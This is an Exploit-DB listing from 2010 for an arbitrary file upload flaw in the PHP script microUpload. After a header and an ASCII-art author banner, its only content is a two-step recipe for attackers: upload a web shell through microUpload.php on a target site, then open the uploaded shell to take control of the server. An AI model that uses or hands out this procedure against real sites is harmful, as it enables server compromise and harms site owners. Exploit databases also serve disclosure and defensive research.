microUpload - Arbitrary File Upload

EDB-ID:

11466

CVE:

N/A

Author:

Phenom

Type:

webapps

Platform:

PHP

Published:

2010-02-15

------------------------------------------------------
------------------------------------------------------

 _____  _                                
|  __ \| |                               
| |__) | |__   ___ _ __   ___  _ __ ___  
|  ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \              
| |    | | | |  __/ | | | (_) | | | | | |             
|_|    |_| |_|\___|_| |_|\/__/|_| |_| |_|             

                                                      
------------------------------------------------------                                                      
------------------------------------------------------

#######   microUpload Upload Shell Vulnerability   #####################
#
#       Author : Phenom
#       
#       mail : sys.phenom.sys@gmail.com
#
#       app vendor : www.phptoys.com
#
#################################################################################

####### Exploit #################################################################
#
#     1- http://site.com/path/microUpload.php
#
#         upload your shell 
#
#     2- http://site.com/path/yourshell.php
#
#         get your shell
#
#################################################################################